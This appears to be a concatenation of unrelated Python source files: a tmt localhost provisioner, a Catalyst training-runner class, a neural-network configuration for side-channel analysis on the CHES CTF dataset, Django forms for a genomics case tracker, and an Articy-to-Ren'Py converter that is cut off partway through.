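    import pprint
    pprint.pprint(parse_schema({
        'username': 'string',
        ('nickname', 'norequired'): 'string',
        'tags': [],
    }))
    # 'username' and 'tags' end up in the 'required' list; 'nickname' does not.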
|
py | 1a3f74816979c8eef428462a6458bc569049529e | import os
from click import echo
from tmt.steps.provision.base import ProvisionBase
from tmt.utils import SpecificationError
class ProvisionLocalhost(ProvisionBase):
""" Localhost provisioner """
def __init__(self, data, step):
super(ProvisionLocalhost, self).__init__(data, step)
self._prepare_map = {
'ansible': self._prepare_ansible,
'shell': self._prepare_shell,
}
def execute(self, *args, **kwargs):
self.run(self.join(args))
def _prepare_ansible(self, what):
""" Run ansible on localhost """
# Playbook paths should be relative to the metadata tree root
playbook = os.path.join(self.step.plan.run.tree.root, what)
# Prepare verbose level based on the --debug option count
verbose = ' -' + self.opt('debug') * 'v' if self.opt('debug') else ''
# Run ansible playbook against localhost, in verbose mode
ansible = (
f'ansible-playbook{verbose} -c local -i localhost, {playbook}')
# Force column width to 80 chars, to mitigate issues with too long
# lines due to indent. Column width is the same as with libvirt plugin.
columns = 'stty cols 80'
self.run(f'sudo sh -c "{columns}; {ansible}"')
    def _prepare_shell(self, what):
        """ Run shell commands on localhost """
# Set current working directory to the test metadata root
self.run(what, cwd=self.step.plan.run.tree.root)
def prepare(self, how, what):
""" Run prepare phase """
try:
self._prepare_map[how](what)
        except KeyError:
raise SpecificationError(
f"Prepare method '{how}' is not supported.")
|
py | 1a3f74fb29fbd48afdf202d2457761bfaaece431 | from typing import ( # isort:skip
Any, Callable, Dict, Mapping, Optional, Tuple, Union # isort:skip
) # isort:skip
from abc import ABC, abstractmethod
from collections import OrderedDict
import torch
from torch import nn
from torch.utils.data import DataLoader, DistributedSampler
from catalyst import utils
from catalyst.utils.tools.typing import (
Criterion, Device, Model, Optimizer, Scheduler
)
from .callback import Callback, LoggerCallback
from .experiment import _Experiment
from .state import _State
class _Runner(ABC):
"""
Abstract class for all runners inherited from
"""
experiment_fn: Callable = _Experiment
state_fn: callable = _State
def __init__(
self,
model: Model = None,
device: Device = None,
):
"""
Args:
model (Model): Torch model object
device (Device): Torch device
"""
# main
self._model: Model = model
self._device: Device = device
self.experiment: _Experiment = None
self.state: _State = None
self.callbacks: OrderedDict[str, Callback] = None
self.loggers: OrderedDict[str, LoggerCallback] = None
self.loaders: OrderedDict[str, DataLoader] = None
# additional
self._check_run = False
@property
def model(self) -> Model:
"""
Returns the runner's model instance
"""
return self._model
@model.setter
def model(self, value: Union[Model, Dict[str, Model]]):
"""
Setter for the runner's model'
"""
if isinstance(value, nn.Module):
model = value
elif isinstance(value, dict):
values_are_models = all(
[isinstance(v, nn.Module) for v in value.values()]
)
if not values_are_models:
raise TypeError(
"Invalid dict value type, must be `torch.nn.Module`"
)
model = value
else:
raise TypeError(
f"Invalid value type "
f"must be `torch.nn.Module` or `Dict[str, torch.nn.Module]` "
f"got '{type(value)}'"
)
if self._device is not None:
model: Model = utils.maybe_recursive_call(
model, "to", device=self._device
)
self._model = model
@property
def device(self) -> Device:
"""
Returns the runner's device instance
"""
return self._device
@device.setter
def device(self, value: Device):
"""
Setter for the runner's device'
"""
if isinstance(value, (str, torch.device)):
self._device = value
else:
raise TypeError(
f"Invalid value type "
f"must be `str` or `torch.device` "
f"got '{type(value)}'"
)
if self._model is not None:
self._model = utils.maybe_recursive_call(
self._model, "to", device=self._device
)
@abstractmethod
def forward(self, batch: Mapping[str, Any], **kwargs) -> Mapping[str, Any]:
"""
Forward method for your Runner
Args:
batch: Key-value batch items
**kwargs: kwargs to pass to the model
"""
pass
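    # Illustrative only (not part of the original class): a minimal subclass
    # might implement forward() roughly as
    #     def forward(self, batch):
    #         return {"logits": self.model(batch["features"])}
    # where the "features" and "logits" keys are assumptions for this sketch.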
def _get_experiment_components(
self, stage: str = None
) -> Tuple[Model, Criterion, Optimizer, Scheduler, Device]:
"""
Inner method for children's classes for model specific initialization.
As baseline, checks device support and puts model on it.
:return:
"""
utils.set_global_seed(self.experiment.initial_seed)
model = self.experiment.get_model(stage)
criterion, optimizer, scheduler = \
self.experiment.get_experiment_components(model, stage)
model, criterion, optimizer, scheduler, device = \
utils.process_components(
model=model,
criterion=criterion,
optimizer=optimizer,
scheduler=scheduler,
distributed_params=self.experiment.distributed_params,
device=self.device
)
return model, criterion, optimizer, scheduler, device
def _prepare_for_stage(self, stage: str):
utils.set_global_seed(self.experiment.initial_seed)
migrating_params = {}
if self.state is not None:
migrating_params.update(
{
"step": self.state.step,
"epoch": self.state.epoch
}
)
utils.set_global_seed(self.experiment.initial_seed)
self.model, criterion, optimizer, scheduler, self.device = \
self._get_experiment_components(stage)
utils.set_global_seed(self.experiment.initial_seed)
self.state = self.state_fn(
stage=stage,
model=self.model,
device=self.device,
criterion=criterion,
optimizer=optimizer,
scheduler=scheduler,
**self.experiment.get_state_params(stage),
**migrating_params
)
utils.set_global_seed(self.experiment.initial_seed)
callbacks = self.experiment.get_callbacks(stage)
loggers = utils.process_callbacks(
OrderedDict(
[
(k, v) for k, v in callbacks.items()
if isinstance(v, LoggerCallback)
]
)
)
callbacks = utils.process_callbacks(
OrderedDict(
[
(k, v) for k, v in callbacks.items()
if not isinstance(v, LoggerCallback)
]
)
)
self.state.loggers = loggers
self.loggers = loggers
self.callbacks = callbacks
def _prepare_for_epoch(self, stage: str, epoch: int):
pass
# @TODO: too complicated -> rewrite
def _run_event(self, event: str, moment: Optional[str]):
fn_name = f"on_{event}"
if moment is not None:
fn_name = f"{fn_name}_{moment}"
# before callbacks
if self.state is not None:
getattr(self.state, f"{fn_name}_pre")()
if self.loggers is not None and moment == "start":
for logger in self.loggers.values():
getattr(logger, fn_name)(self.state)
# running callbacks
if self.callbacks is not None:
for callback in self.callbacks.values():
getattr(callback, fn_name)(self.state)
# after callbacks
if self.loggers is not None and \
(moment == "end" or moment is None): # for on_exception case
for logger in self.loggers.values():
getattr(logger, fn_name)(self.state)
if self.state is not None:
getattr(self.state, f"{fn_name}_post")()
def _batch2device(self, batch: Mapping[str, Any], device: Device):
output = utils.any2device(batch, device)
return output
def _run_batch_train_step(self, batch: Mapping[str, Any]):
self.state.output = self.forward(batch)
@torch.no_grad()
def predict_batch(
self, batch: Mapping[str, Any], **kwargs
) -> Mapping[str, Any]:
"""
Run model for a batch of elements
WARN: You should not override this method. If you need specific model
call, override forward() method
Args:
batch: Key-value batch items
**kwargs: kwargs to pass to the model
Returns:
model output key-value
"""
batch = self._batch2device(batch, self.device)
output = self.forward(batch, **kwargs)
return output
def _run_batch(self, batch: Mapping[str, Any]):
self.state.step += self.state.batch_size
batch = self._batch2device(batch, self.device)
self.state.input = batch
self.state.timer.stop("_timers/data_time")
self._run_event("batch", moment="start")
self.state.timer.start("_timers/model_time")
self._run_batch_train_step(batch=batch)
self.state.timer.stop("_timers/model_time")
self.state.timer.stop("_timers/batch_time")
self._run_event("batch", moment="end")
def _run_loader(self, loader: DataLoader):
self.state.batch_size = (
loader.batch_sampler.batch_size
if loader.batch_sampler is not None else loader.batch_size
)
self.state.step = (
self.state.step
or self.state.epoch * len(loader) * self.state.batch_size
)
# @TODO: remove time usage, use it under the hood
self.state.timer.reset()
self.state.timer.start("_timers/batch_time")
self.state.timer.start("_timers/data_time")
for i, batch in enumerate(loader):
self._run_batch(batch)
self.state.timer.reset()
if self._check_run and i >= 2:
break
self.state.timer.start("_timers/batch_time")
self.state.timer.start("_timers/data_time")
def _run_epoch(self, stage: str, epoch: int):
self._prepare_for_epoch(stage=stage, epoch=epoch)
assert self.loaders is not None
loaders = self.loaders
# @TODO: better solution with train/inference handling ?
if not self.state.stage.startswith("infer"):
assert self.state.valid_loader in loaders.keys(), \
f"'{self.state.valid_loader}' " \
f"should be in provided loaders: {list(loaders.keys())}"
else:
assert not any(x.startswith("train") for x in loaders.keys()), \
"for inference no train loader should be passed"
for loader_name, loader in loaders.items():
self.state.loader_name = loader_name
self.state.loader_len = len(loader)
self.state.need_backward = loader_name.startswith("train")
self.model.train(self.state.need_backward)
if isinstance(loader.sampler, DistributedSampler) \
and loader_name.startswith("train"):
loader.sampler.set_epoch(self.state.stage_epoch)
utils.set_global_seed(
self.experiment.initial_seed + self.state.epoch + 1
)
self._run_event("loader", moment="start")
with torch.set_grad_enabled(self.state.need_backward):
self._run_loader(loader)
self._run_event("loader", moment="end")
def _run_stage(self, stage: str):
self._prepare_for_stage(stage)
self._run_event("stage", moment="start")
for epoch in range(self.state.num_epochs):
self.state.stage_epoch = epoch
self._run_event("epoch", moment="start")
self._run_epoch(stage=stage, epoch=epoch)
self._run_event("epoch", moment="end")
if self._check_run and self.state.stage_epoch >= 2:
break
if self.state.early_stop:
self.state.early_stop = False
break
self.state.epoch += 1
self._run_event("stage", moment="end")
def run_experiment(self, experiment: _Experiment, check: bool = False):
"""
Starts the experiment
"""
self._check_run = check
self.experiment = experiment
# jupyter source code logging hack
# + hack to prevent cycle imports
# @TODO: remove hack to catalyst.dl only, not core
# from catalyst.dl.experiment import BaseExperiment
# if isinstance(self.experiment, BaseExperiment) \
# and self.experiment.logdir is not None:
# expdir = Path(os.getcwd())
# logdir = Path(self.experiment.logdir)
# utils.dump_base_experiment_code(expdir, logdir)
try:
for stage in self.experiment.stages:
self._run_stage(stage)
except (Exception, KeyboardInterrupt) as ex:
# if an exception had been raised
# before the exception-handlers were initialized
if self.loggers is None or self.callbacks is None:
raise ex
else:
self.state.exception = ex
self._run_event("exception", moment=None)
return self
__all__ = ["_Runner"]
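# --- Illustrative example (not part of catalyst) ------------------------------
# A minimal sketch of how a concrete runner could subclass _Runner. The class
# name, the "features"/"logits" batch keys and the toy model in the usage notes
# are assumptions made for illustration only.
class _ExampleSupervisedRunner(_Runner):
    def forward(self, batch: Mapping[str, Any], **kwargs) -> Mapping[str, Any]:
        # assumes the network input is stored under the "features" key
        logits = self.model(batch["features"], **kwargs)
        return {"logits": logits}
# usage sketch (kept as comments to avoid import-time side effects):
# runner = _ExampleSupervisedRunner(model=nn.Linear(10, 2), device="cpu")
# output = runner.predict_batch({"features": torch.randn(4, 10)})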
|
py | 1a3f75621fa9836999669f720440d0b804ee193a | from sklearn import preprocessing
from . import state_space_parameters as ssp
import countermeasures.data_loader as data_loader
import numpy as np
import tensorflow as tf
MODEL_NAME = 'CHES_CTF_HW'
# Number of output neurons
NUM_CLASSES = 9 # Number of output neurons
# Input Size
INPUT_SIZE = 2200
# Batch Queue parameters
TRAIN_BATCH_SIZE = 400 # Batch size for training (scaled linearly with number of gpus used)
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 45000 # Number of training examples
VALIDATION_FROM_ATTACK_SET = True
EVAL_BATCH_SIZE = TRAIN_BATCH_SIZE # Batch size for validation
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 2500 # Number of validation examples
MAX_EPOCHS = 50 # Max number of epochs to train model
# Training Parameters
OPTIMIZER = 'Adam' # Optimizer (should be in caffe format string)
MAX_LR = 5e-3 # The max LR (scaled linearly with number of gpus used)
# Bulk data folder
BULK_ROOT = '/tudelft.net/staff-bulk/ewi/insy/CYS/spicek/jrijsdijk/rl-paper/CHES_CTF/cm_experiment_hw/'
DATA_ROOT = BULK_ROOT + '../data/'
# Trained model dir
TRAINED_MODEL_DIR = BULK_ROOT + 'trained_models'
DB_FILE = DATA_ROOT + 'ches_ctf.h5'
(TRAIN_TRACES, TRAIN_DATA), (ATTACK_TRACES, ATTACK_DATA) = data_loader.load_ches_hd5(
DB_FILE,
'/Profiling_traces/traces', '/Profiling_traces/metadata',
'/Attack_traces/traces', '/Attack_traces/metadata'
)
TRAIN_LABELS = np.array([bin(x).count("1") for x in np.load(DATA_ROOT + 'train_labels.npy')])
ATTACK_LABELS = np.array([bin(x).count("1") for x in np.load(DATA_ROOT + 'attack_labels.npy')])
NOISE_SCALE = data_loader.get_noise_scale(TRAIN_TRACES)
USE_OCLR = True
MODEL_PREPROCESSING = [
preprocessing.StandardScaler()
]
MODEL_LAYERS = [
tf.keras.layers.Conv1D(4, 100, kernel_initializer='he_uniform', activation='selu', padding='same'),
tf.keras.layers.AveragePooling1D(4, strides=4),
tf.keras.layers.Flatten(name='flatten'),
tf.keras.layers.Dense(15, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(10, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(10, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
KEY = np.load(DATA_ROOT + 'attack_key.npy')
ATTACK_KEY_BYTE = 0
ATTACK_PRECOMPUTED_BYTE_VALUES = np.array(
[[bin(x).count("1") for x in row] for row in
np.load(DATA_ROOT + f'attack_precomputed_byte{ATTACK_KEY_BYTE}_values.npy')]
)
TRACES_PER_ATTACK = 2000 # Maximum number of traces to use per attack
NUM_ATTACKS = 100 # Number of attacks to average the GE over
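# --- Illustrative sketch (not part of the configuration) ----------------------
# One way the settings above could be assembled into a compiled Keras model.
# The InputLayer shape (INPUT_SIZE, 1), the loss choice and the metric are
# assumptions for this sketch; the search framework may wire things differently.
def build_example_model():
    model = tf.keras.Sequential(
        [tf.keras.layers.InputLayer(input_shape=(INPUT_SIZE, 1))] + MODEL_LAYERS
    )
    model.compile(
        optimizer=tf.keras.optimizers.Adam(learning_rate=MAX_LR),
        loss='sparse_categorical_crossentropy',
        metrics=['accuracy'],
    )
    return model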
|
py | 1a3f75aa42b53a347e1cf5cc2950a9abd0fddfff | """Copyright (c) 2018 Great Ormond Street Hospital for Children NHS Foundation
Trust & Birmingham Women's and Children's NHS Foundation Trust
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from datetime import datetime
from django import forms
from django.contrib.auth.models import User
from django.forms import HiddenInput, Textarea, CheckboxInput, Select, ModelChoiceField
from django.forms import BaseFormSet
from .models import *
class UserForm(forms.ModelForm):
"""
User registration form
"""
password = forms.CharField(widget=forms.PasswordInput())
role_choices = (('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff'))
role = forms.ChoiceField(choices=role_choices)
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class Meta:
model = User
fields = ('first_name', 'last_name', 'email', 'password')
class ProfileForm(forms.Form):
"""
Allows users to change their info.
TODO - Remove this as could be security risk if 2 permission layers are introduced
"""
role_choices = (('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff'),
('Unknown', 'Unknown'),)
role = forms.ChoiceField(choices=role_choices, required=False)
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class ProbandForm(forms.ModelForm):
'''
Form used for allowing users edit proband information
'''
class Meta:
model = Proband
fields = ['outcome', 'comment']
widgets = {
'outcome': Textarea(attrs={'rows': '3'}),
'comment': Textarea(attrs={'rows': '3'}),
}
class VariantValidationForm(forms.ModelForm):
"""
Form used to change values used for variant validation tracking.
"""
def __init__(self, *args, **kwargs):
super(VariantValidationForm, self).__init__(*args, **kwargs)
self.fields['validation_responsible_user'].required=False
class Meta:
model = ProbandVariant
fields = [
'validation_status',
'validation_responsible_user',
]
class AddCommentForm(forms.ModelForm):
'''
Adds a new CaseComment in the Proband page
'''
class Meta:
model = CaseComment
fields = ['comment']
class GELIRForm(forms.ModelForm):
'''
Form used for allowing users edit proband information
'''
class Meta:
model = GELInterpretationReport
fields = ['case_status', 'mdt_status', 'pilot_case', 'case_sent', 'no_primary_findings', 'case_code']
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.case_status = data['case_status']
gelir.mdt_status = data['mdt_status']
gelir.pilot_case = data['pilot_case']
gelir.case_sent = data['case_sent']
gelir.no_primary_findings = data['no_primary_findings']
gelir.case_code = data['case_code']
gelir.save(overwrite=True)
class RelativeForm(forms.ModelForm):
'''
Form used for allowing users edit Relative demographics
'''
class Meta:
model = Relative
fields = ['forename', 'surname', 'date_of_birth', 'nhs_number',
'sex', 'affected_status']
class DemogsForm(forms.ModelForm):
'''
Form used for allowing users edit proband demographics
'''
class Meta:
model = Proband
fields = ['nhs_number', 'lab_number', 'forename', 'surname', 'date_of_birth', 'sex', 'local_id', 'gmc']
class PanelForm(forms.Form):
'''
Form used for allowing users to add a panel to a proband
'''
panel = forms.ModelChoiceField(queryset=PanelVersion.objects.order_by('panel'))
class ClinicianForm(forms.Form):
'''
Form used for allowing users to change a probands clinician
'''
clinician = forms.ModelChoiceField(queryset=Clinician.objects.filter(added_by_user=True).order_by('name'))
class AddClinicianForm(forms.ModelForm):
'''
Form used in Proband View to allow users add a new Clinician
'''
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class Meta:
model = Clinician
fields = ['name', 'hospital', 'email']
class UserChoiceField(ModelChoiceField):
def label_from_instance(self, obj):
return "%s %s" % (obj.first_name, obj.last_name)
class CaseAssignForm(forms.ModelForm):
'''
Form for specifying which user a case is assigned to
'''
assigned_user = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["assigned_user"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.assigned_user = data['assigned_user']
gelir.save(overwrite=True)
class FirstCheckAssignForm(forms.ModelForm):
'''
Form for specifying which user performed the first check
'''
first_check = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["first_check"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.first_check = data['first_check']
gelir.save(overwrite=True)
class SecondCheckAssignForm(forms.ModelForm):
'''
Form for specifying which user performed the second check
'''
second_check = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["second_check"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.second_check = data['second_check']
gelir.save(overwrite=True)
class MdtForm(forms.ModelForm):
'''
Form which edits MDT instance specific fields such as date and status
'''
class Meta:
model = MDT
fields = ['description', 'date_of_mdt', 'status', 'sent_to_clinician']
class MdtSentToClinicianForm(forms.ModelForm):
'''
Form for recording the whether the MDT list has been sent to the clinician
'''
class Meta:
model = MDT
fields = ['sent_to_clinician']
def __init__(self, *args, **kwargs):
super(MdtSentToClinicianForm, self).__init__(*args, **kwargs)
self.fields['sent_to_clinician'].required = False
class ProbandMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in proband textfields
'''
class Meta:
model = Proband
fields = ('discussion', 'action')
widgets = {
'discussion': Textarea(attrs={'rows': '3'}),
'action': Textarea(attrs={'rows': '3'}),
}
class GELIRMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in proband textfields
'''
class Meta:
model = GELInterpretationReport
fields = ('case_status',)
def __init__(self, *args, **kwargs):
super(GELIRMDTForm, self).__init__(*args, **kwargs)
self.fields['case_status'].required = False
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.case_status = data['case_status']
gelir.save(overwrite=True)
class RareDiseaseMDTForm(forms.ModelForm):
'''
    Form used in Proband View at MDT which allows users to fill in exit questionnaire questions
'''
requires_validation = forms.ChoiceField(
choices=(
('U', 'Unknown'),
('A', 'Awaiting Validation'),
('K', 'Urgent Validation'),
('I', 'In Progress'),
('P', 'Passed Validation'),
('F', 'Failed Validation'),
('N', 'Not Required'),
)
)
class Meta:
model = RareDiseaseReport
fields = (
'contribution_to_phenotype', 'change_med',
'clinical_trial', 'requires_validation',
'discussion', 'action',
'inform_reproductive_choice', 'surgical_option',
'add_surveillance_for_relatives',
'classification', 'id',)
widgets = {
'id': HiddenInput(),
'surgical_option': CheckboxInput(),
'requires_validation': Select(),
'change_med': CheckboxInput(),
'add_surveillance_for_relatives': CheckboxInput(),
'clinical_trial': CheckboxInput(),
'inform_reproductive_choice': CheckboxInput(),
'discussion': Textarea(attrs={'rows': '4'}),
'action': Textarea(attrs={'rows': '4'})
}
def save(self, commit=True):
selected_validation_status = self.cleaned_data['requires_validation']
pv = self.instance.proband_variant
pv.validation_status = selected_validation_status
if not pv.validation_datetime_set:
pv.validation_datetime_set = datetime.now()
pv.save()
return super(RareDiseaseMDTForm, self).save(commit=commit)
class CancerMDTForm(forms.ModelForm):
'''
    Form used in Proband View at MDT which allows users to fill in exit questionnaire questions
'''
requires_validation = forms.ChoiceField(
choices=(
('U', 'Unknown'),
('A', 'Awaiting Validation'),
('K', 'Urgent Validation'),
('I', 'In Progress'),
('P', 'Passed Validation'),
('F', 'Failed Validation'),
('N', 'Not Required'),
)
)
class Meta:
model = CancerReport
fields = ('variant_use', 'action_type', 'validated',
'validated_assay_type',
'classification', 'id',)
widgets = {'id': HiddenInput(),
'validated': CheckboxInput(),
}
def save(self, commit=True):
selected_validation_status = self.cleaned_data['requires_validation']
pv = self.instance.proband_variant
pv.validation_status = selected_validation_status
if not pv.validation_datetime_set:
pv.validation_datetime_set = datetime.now()
pv.save()
return super(CancerMDTForm, self).save(commit=commit)
class AddNewAttendee(forms.Form):
'''
Form for allowing users to add new attendee which would then be inserted into CS, Clinician or OtherStaff table
'''
name = forms.CharField()
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
email = forms.EmailField()
role = forms.ChoiceField(choices=(('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff')))
class AddVariantForm(forms.ModelForm):
'''
Allows users to add a variant to a report. Users have to enter
chromosome, position, reference, alternate, dbsnp
    TODO should check everything users enter for consistency
'''
def clean_reference(self):
data = self.cleaned_data['reference'].strip()
if not all([f in ['A', 'T', 'G', 'C'] for f in data]):
raise forms.ValidationError("Not DNA sequence")
else:
return data
def clean_alternate(self):
data = self.cleaned_data['alternate'].strip()
if not all([f in ['A', 'T', 'G', 'C'] for f in data]):
raise forms.ValidationError("Not DNA sequence")
else:
return data
class Meta:
model = Variant
fields = ['chromosome',
'position',
'reference',
'alternate',
'db_snp_id']
widgets = {'reference': Textarea(attrs={'rows': '2'}),
'alternate': Textarea(attrs={'rows': '2'})}
class GenomicsEnglandform(forms.Form):
""" Form for entering genomics england information to render a report to be used by the scientists """
interpretation_id = forms.IntegerField(label='Interpretation ID')
# Version number of the interpretation
ir_version = forms.IntegerField(label='Version')
report_version = forms.IntegerField(label='Clinical Report Version')
class GeneSearchForm(forms.Form):
gene = forms.CharField(max_length=25, widget = forms.TextInput(attrs={'style': 'width:200px'}))
class AddCaseAlert(forms.ModelForm):
def clean_gel_id(self):
if self.cleaned_data['gel_id'].isdigit() and len(self.cleaned_data['gel_id']) >= 8:
return self.cleaned_data['gel_id'].strip()
else:
            raise forms.ValidationError("Doesn't look like a GELID")
class Meta:
model = CaseAlert
fields = ['gel_id', 'comment', 'sample_type']
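# --- Illustrative usage (not part of this module) ------------------------------
# A typical way one of the forms above might be wired into a view; the view
# name, URL name and template path are placeholders, not real project code.
# def add_variant(request, report_id):
#     form = AddVariantForm(request.POST or None)
#     if request.method == 'POST' and form.is_valid():
#         variant = form.save()
#         return redirect('report-detail', report_id)
#     return render(request, 'add_variant.html', {'form': form})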
|
py | 1a3f75cb101ec6ef6fd9b41a170a98b7797fecf6 | import argparse
import json
from ArticyCoreClass import ArticyCore
from ArticyCoreClass import Character
from ArticyCoreClass import FlowFrag
from ArticyCoreClass import Episode
from ArticyCoreClass import Scene
from ArticyCoreClass import Dialog
from ArticyCoreClass import Condition
from ArticyCoreClass import Instruction
from ArticyCoreClass import Snippet
from ArticyCoreClass import Code
from ArticyCoreClass import Game
from ArticyCoreClass import Hub
parser = argparse.ArgumentParser(description='Convert the JSON file from Articy to a Renpy file')
parser.add_argument('-i', required=True, help='JSON file created by Articy (required)')
parser.add_argument('-o', required=False, help='Renpy file created from the JSON file')
args = parser.parse_args()
#print(args)
#print(args.i)
#-------------------------------------------------------------------------------
f = open(args.i)
data = json.load(f)
f.close()
TheGame: Game = None
Characters = []
FlowFrags = []
Episodes = []
Scenes = []
Dialogs = []
Conditions = []
Snippets = []
Codes = []
Instructions = []
Hubs = []
#-------------------------------------------------------------------------------
# parse the JSON file, building up internal data structures
for package in data['Packages']:
for model in package['Models']:
if model['Type']=='DialogueFragment':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
dialog = Dialog(properties['Id'], properties['Parent'], properties['MenuText'], properties['StageDirections'], properties['Speaker'], properties['Text'], outputs)
Dialogs.append(dialog)
elif model['Type']=='Instruction':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
instruction = Instruction(frag, properties['Expression'])
Instructions.append(instruction)
elif model['Type']=='Condition':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
condition = Condition(frag, properties['Expression'])
Conditions.append(condition)
elif model['Type']=='Hub':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
hub = Hub(frag, "hub")
Hubs.append(hub)
elif model['Type']=='DefaultMainCharacterTemplate_02':
properties = model['Properties']
color = properties['Color']
template = model['Template']
basic = template['DefaultBasicCharacterFeature_02']
colorR = round(255*color['r'])
colorG = round(255*color['g'])
colorB = round(255*color['b'])
char = Character(properties['Id'], properties['DisplayName'], (colorR, colorG, colorB), basic['AbreviatedName'])
Characters.append(char)
elif (model['Type']=='FlowFragment') or (model['Type']=='Dialogue'):
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
if 'Connections' in outputpin:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
FlowFrags.append(frag)
names = frag.Name.split()
if names[0].lower()[:7] == 'episode':
episode = Episode(frag)
Episodes.append(episode)
elif names[0].lower()[:5] == 'scene':
scene = Scene(frag)
Scenes.append(scene)
elif names[0].lower()[:7] == 'snippet':
scene = Snippet(frag)
Snippets.append(scene)
elif names[0].lower()[:4] == 'code':
scene = Code(frag)
Codes.append(scene)
elif names[0].lower()[:4] == 'game':
TheGame = Game(frag)
else:
print('Unhandled ???')
print(model['Type'])
print()
#-------------------------------------------------------------------------------
# For debug purposes, print out the data structures created from parsing the JSON file
print('Characters:')
Characters.sort(key=lambda character: character.Name)
for char in Characters:
print(char)
print()
print('FlowFrags:')
for frag in FlowFrags:
print(frag)
print()
print('Game:')
print(TheGame)
print()
print('Episodes:')
Episodes.sort(key=lambda episode: episode.Num)
for episode in Episodes:
print(episode)
print()
print('Scenes:')
Scenes.sort(key=lambda scene: scene.Num)
for scene in Scenes:
print(scene)
print()
print('Snippets:')
Snippets.sort(key=lambda snippet: snippet.Num)
for snippet in Snippets:
print(snippet)
print()
print('Dialogs:')
for dialog in Dialogs:
# if dialog.StageDirections == 'aurora smirks':
if dialog.StageDirections == 'art sad':
debug = 1
dialog.MakeConnections(Scenes, Characters, Dialogs, Conditions, Instructions, Codes, Snippets, Hubs)
for dialog in Dialogs:
print(dialog)
print()
def Connections(name, clist: []):
print(name+":")
for citem in clist:
citem.MakeConnections(Scenes, Dialogs, Conditions, Instructions, Codes, Snippets, Hubs)
print(citem)
print()
Connections('Conditions', Conditions)
Connections('Instructions', Instructions)
Connections('Code Blocks', Codes)
Connections('Snippets', Snippets)
Connections('Hubs', Hubs)
#-------------------------------------------------------------------------------
# Now translate the structures into a Ren'Py representation
TheGame.MakeLinkages(Episodes)
print(TheGame.Title())
episode = TheGame.First
while episode != None:
print(' ', episode.Title())
episode.MakeLinkages(Scenes)
scene = episode.First
while scene != None:
